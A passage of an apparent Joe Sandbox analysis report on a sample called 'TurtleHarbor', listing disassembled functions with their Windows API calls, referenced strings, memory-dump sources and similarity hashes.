Opcode Fuzzy Hash: 073c120354c7ab8273e8183032baa3e7db1370a5482e6e648ffacd04508d32ab
Instruction Fuzzy Hash: B161B0702087019FC716EF64C885F6AF7E8AF89714F50488DF5859B291DB74ED48CBA2

Function 00385E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00385E7E
inet_addr.WSOCK32(?,?,?), ref: 00385EC3
gethostbyname.WSOCK32(?), ref: 00385ECF
IcmpCreateFile.IPHLPAPI ref: 00385EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00385F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00385F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00385FD8
WSACleanup.WSOCK32 ref: 00385FDE

Strings

Ping, xrefs: 00385F01

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 23da2c1a3f164f32c287e0508edd3a2ff38f598a972bc378d978a778cd4f32c1
Instruction ID: ce023dcc56880df951f181ebfc1314bd010a4ef0da4673827227f467c6d46d13
Opcode Fuzzy Hash: 23da2c1a3f164f32c287e0508edd3a2ff38f598a972bc378d978a778cd4f32c1
Instruction Fuzzy Hash: 5F519F31604700DFDB22EF24DC49B6AB7E8EF49710F1485A9FA95DB2A1DB70E940CB42

Function 0037BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0037BB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0037BB89
GetLastError.KERNEL32 ref: 0037BB93
SetErrorMode.KERNEL32(00000000,READY), ref: 0037BC00

Strings

READONLY, xrefs: 0037BBCB
UNKNOWN, xrefs: 0037BBB8
INVALID, xrefs: 0037BBD2
NOTREADY, xrefs: 0037BBBF
READY, xrefs: 0037BBD9

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: ff28db7c7adf4aa179d737bd50b3d760bf26abf43f9c14890cce970e53d3c3e8
Instruction ID: 45b093e5fa4c58913e3e6c930c732517d2f23d0807715ef6f00ba1b1250a5317
Opcode Fuzzy Hash: ff28db7c7adf4aa179d737bd50b3d760bf26abf43f9c14890cce970e53d3c3e8
Instruction Fuzzy Hash: C4318335A002099FCB26DF64C885FADF7B8EF45310F158059EC09DB295DB759D41CB51

Function 003734DD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0037357C

Strings

stop, xrefs: 0037354D
question, xrefs: 00373535
warning, xrefs: 00373565
,z=0z=, xrefs: 0037358D
info, xrefs: 0037351D
blank, xrefs: 003734FE
,z=0z=, xrefs: 0037350F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: IconLoad
String ID: ,z=0z=$,z=0z=$blank$info$question$stop$warning
API String ID: 2457776203-1050991176
Opcode ID: 0573be7a0c8ff590aee88871506c7bc7f66c5f224b4baed5a551d477cd9f4afd
Instruction ID: 69aef92e82e511ebdaffc141e91253f79af9735826f269113660e8ed451de9ba
Opcode Fuzzy Hash: 0573be7a0c8ff590aee88871506c7bc7f66c5f224b4baed5a551d477cd9f4afd
Instruction Fuzzy Hash: 2211057164C346BAE7275A14DCC2DAA779CDF17770F20802EFA08EA181E7686F4067A0

Function 00369B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0036B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0036B7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00369BCC
GetDlgCtrlID.USER32 ref: 00369BD7
GetParent.USER32 ref: 00369BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00369BF6
GetDlgCtrlID.USER32(?), ref: 00369BFF
GetParent.USER32(?), ref: 00369C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00369C1E

Strings

ListBox, xrefs: 00369B89
ComboBox, xrefs: 00369B54

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 71992ea0ed5d58617c40737d2f35611b1fcb5a4c389c7beb561571442cf896f1
Instruction ID: ca9513076721dc187bb3f10df62ee34157698df1764ab4c7ce420dc3ea243414
Opcode Fuzzy Hash: 71992ea0ed5d58617c40737d2f35611b1fcb5a4c389c7beb561571442cf896f1
Instruction Fuzzy Hash: C521D374900118BFCF06EB64DC85EFEBBB9EF96310F104116F9619B2E5DB7449189B60

Function 00369C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0036B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0036B7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00369CB5
GetDlgCtrlID.USER32 ref: 00369CC0
GetParent.USER32 ref: 00369CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00369CDF
GetDlgCtrlID.USER32(?), ref: 00369CE8
GetParent.USER32(?), ref: 00369D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00369D07

Strings

ListBox, xrefs: 00369C74
ComboBox, xrefs: 00369C3F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: f87e3b23a427a7da41366d59729d7b1d8d0e18980981499591d40b23f92adfcb
Instruction ID: 9070b9724904455cd9a2d4c29020bc6b087feccb03509596527e281d6850ef56
Opcode Fuzzy Hash: f87e3b23a427a7da41366d59729d7b1d8d0e18980981499591d40b23f92adfcb
Instruction Fuzzy Hash: FE21D075E40108BBDF06ABA4CC85EFEBBBDEF95300F104016F951972A5DB7589289B20

Function 00369D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00369D27
GetClassNameW.USER32(00000000,?,00000100), ref: 00369D3C
_wcscmp.LIBCMT ref: 00369D4E
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00369DC9

Strings

SHELLDLL_DefView, xrefs: 00369D48
details, xrefs: 00369D77
largeicons, xrefs: 00369D5D
list, xrefs: 00369DAB
smallicons, xrefs: 00369D91

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 56b3b61f76a0dfde88c3f311ce7df2789e72ea08557f61a6a687631156a87633
Instruction ID: 54bef0099cf295a5a2ede3ac0ad2dc8a4ff4ca061d7f01195e041c9600036253
Opcode Fuzzy Hash: 56b3b61f76a0dfde88c3f311ce7df2789e72ea08557f61a6a687631156a87633
Instruction Fuzzy Hash: 7711297664870AFAF6072624EC06FE6739CDB06324F208037FA10E80E5FEB66E115B55

Function 00377F4B Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00378027

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 5c6f1c6c65456cd32601e58010fb4d8d6601c6224ef9b87d09128bde1e6dec91
Instruction ID: 61d0c798e69a7802d0d85c2b195db01286c8772d0fb17046ee51f4874265cac5
Opcode Fuzzy Hash: 5c6f1c6c65456cd32601e58010fb4d8d6601c6224ef9b87d09128bde1e6dec91
Instruction Fuzzy Hash: 18B1B571A042099FDB26DF94D888BBEB7F9FF09311F158429E605EB251DB38D941CB90

Function 003719CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 003719EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00370A67,?,00000001), ref: 00371A03
GetWindowThreadProcessId.USER32(00000000), ref: 00371A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00370A67,?,00000001), ref: 00371A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00371A2B
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00370A67,?,00000001), ref: 00371A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00370A67,?,00000001), ref: 00371A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00370A67,?,00000001), ref: 00371A9B
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00370A67,?,00000001), ref: 00371AB0
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00370A67,?,00000001), ref: 00371ABB

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 6944ed509b7ec407d29859d3bd42f39893a19bfa72c0a955707d3dec948384f7
Instruction ID: 3c607060c6833b409eabc9e0659d6697c46b8907739f8cac2e16ac2ee3044d0a
Opcode Fuzzy Hash: 6944ed509b7ec407d29859d3bd42f39893a19bfa72c0a955707d3dec948384f7
Instruction Fuzzy Hash: 0931E172512204AFDB779F18EC44FAA37AEEB65319F128116F808C61A0DBB8AD508F50

Function 0034C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0031260D
SetTextColor.GDI32(?,000000FF), ref: 00312617
SetBkMode.GDI32(?,00000001), ref: 0031262C
GetStockObject.GDI32(00000005), ref: 00312634
GetClientRect.USER32(?), ref: 0034C0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 0034C113
GetWindowDC.USER32(?), ref: 0034C11F
GetPixel.GDI32(00000000,?,?), ref: 0034C12E
ReleaseDC.USER32(?,00000000), ref: 0034C140
GetSysColor.USER32(00000005), ref: 0034C15E

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: c730c4a237bda0ed9384a8b98d8fa1784462aade84bb1667633ac909e49395a4
Instruction ID: b8113aababfa3c7702e4a9ae2db259a49271b391728dba9962ee727afa57a92d
Opcode Fuzzy Hash: c730c4a237bda0ed9384a8b98d8fa1784462aade84bb1667633ac909e49395a4
Instruction Fuzzy Hash: 1B118B31505204BFDB6B5FB4EC48BEA7BBAEB0A321F104225FA65950F1CB7119A1EF11

Function 0036AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0036B13A), ref: 0036B078

Strings

TEXT, xrefs: 0036AFAF
INSTANCE, xrefs: 0036AF86
REGEXPCLASS, xrefs: 0036AE3D
NAME, xrefs: 0036AEAA
CLASSNN, xrefs: 0036AE1A
CLASS, xrefs: 0036ADF7

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 4ced1c474730d62816547e02dd831565d719a54249639fc513caad3a9f776fb8
Instruction ID: 94f1ebd4bf3c8a2858a6b1c575e7f87898c1ac2dd107ce8500440d49e57b50b4
Opcode Fuzzy Hash: 4ced1c474730d62816547e02dd831565d719a54249639fc513caad3a9f776fb8
Instruction Fuzzy Hash: 7E91C770500915EACB1AEF60C481BEEFBB4BF14304F10C119E85AEB155DF306999CFA1

Function 003131F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0031327E

Part of subcall function 0031218F: GetClientRect.USER32(?,?), ref: 003121B8
Part of subcall function 0031218F: GetWindowRect.USER32(?,?), ref: 003121F9
Part of subcall function 0031218F: ScreenToClient.USER32(?,?), ref: 00312221

GetDC.USER32 ref: 0034D073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0034D086
SelectObject.GDI32(00000000,00000000), ref: 0034D094
SelectObject.GDI32(00000000,00000000), ref: 0034D0A9
ReleaseDC.USER32(?,00000000), ref: 0034D0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0034D13C

Strings

U, xrefs: 0034D011

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: d54352ba3d51518ccfcfa875eb71881e17debe613afda2af0b68c275f78d5a58
Instruction ID: e4ac4eae0ea9167eb6e3cfbaad7b2b6982cbb3f3a49dce5f3b23f01007667904
Opcode Fuzzy Hash: d54352ba3d51518ccfcfa875eb71881e17debe613afda2af0b68c275f78d5a58
Instruction Fuzzy Hash: 3871DD30500205EFCF279F64C884AEA7BF9FF49320F15466AED555F2A6C731A882DB60

Function 0039C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

Part of subcall function 00312714: GetCursorPos.USER32(?), ref: 00312727
Part of subcall function 00312714: ScreenToClient.USER32(003D77B0,?), ref: 00312744
Part of subcall function 00312714: GetAsyncKeyState.USER32(00000001), ref: 00312769
Part of subcall function 00312714: GetAsyncKeyState.USER32(00000002), ref: 00312777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0039C69C
ImageList_EndDrag.COMCTL32 ref: 0039C6A2
ReleaseCapture.USER32 ref: 0039C6A8
SetWindowTextW.USER32(?,00000000), ref: 0039C752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0039C765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0039C847

Strings

@GUI_DRAGFILE, xrefs: 0039C7DC
@GUI_DROPID, xrefs: 0039C799

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 8192fd052ffe5c8f48e772fda2b7625b6aa45cac70daa648c8e309bf4c2f1216
Instruction ID: 22026ed4222895d0053a8c631205168b0626c59715e4e831b60a61c61fa68407
Opcode Fuzzy Hash: 8192fd052ffe5c8f48e772fda2b7625b6aa45cac70daa648c8e309bf4c2f1216
Instruction Fuzzy Hash: 8551CE71508304AFDB06EF14DC5AFAA7BE5EB88310F00491DF9958B2E1DB30A958CB52

Function 003820E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0038211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00382148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0038218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0038219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003821AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003821DC
InternetCloseHandle.WININET(00000000), ref: 00382223

Part of subcall function 00382B4F: GetLastError.KERNEL32(?,?,00381EE3,00000000,00000000,00000001), ref: 00382B64
Part of subcall function 00382B4F: SetEvent.KERNEL32(?,?,00381EE3,00000000,00000000,00000001), ref: 00382B79

Strings

, xrefs: 003821CD

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 34185ea5114c686591f78e54a9c10e5acfb87bc1c6d4c48a1436d1587cf272c2
Instruction ID: c98ebde9b17d6d203722e2eefe76a89a2aa808c67dbd00bbc59c51cc01c7424e
Opcode Fuzzy Hash: 34185ea5114c686591f78e54a9c10e5acfb87bc1c6d4c48a1436d1587cf272c2
Instruction Fuzzy Hash: A3416DB1501318BFEB57AF60CC89FBB7BACEF09354F104156FA059A191D771AE448BA0

Function 00389330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,003A0980), ref: 00389412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003A0980), ref: 00389446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003895C0
SysFreeString.OLEAUT32(?), ref: 003895EA

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: ba583d045e5128db1709ab32be8650a3e6578c90cb4d641a96101be1bb68a1d7
Instruction ID: cf1458e4216bd2141a400f9afdcca15d2eb6925838d140bfff5bd1c0fd2df04f
Opcode Fuzzy Hash: ba583d045e5128db1709ab32be8650a3e6578c90cb4d641a96101be1bb68a1d7
Instruction Fuzzy Hash: 0CF12B71A00209EFCB16EF94C884EBEB7B9FF49314F158099F516AB251DB31AE46CB50

Function 0038FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0038FD9E
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0038FF31
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0038FF55
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0038FF95
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0038FFB7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00390133
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00390165
CloseHandle.KERNEL32(?), ref: 00390194
CloseHandle.KERNEL32(?), ref: 0039020B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 1a20055f6b97ea6eb2147e59e18e89e62193de570028675d3bcbd71cbb098f95
Instruction ID: 863ca28694457f730dcb48b705c0478c2434f3be6cfe4b692d14f502931af45c
Opcode Fuzzy Hash: 1a20055f6b97ea6eb2147e59e18e89e62193de570028675d3bcbd71cbb098f95
Instruction Fuzzy Hash: 50E1A031204301DFCB1AEF24C891B6ABBE5AF89310F15855DF9999F2A2DB31EC45CB52

Function 0037527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

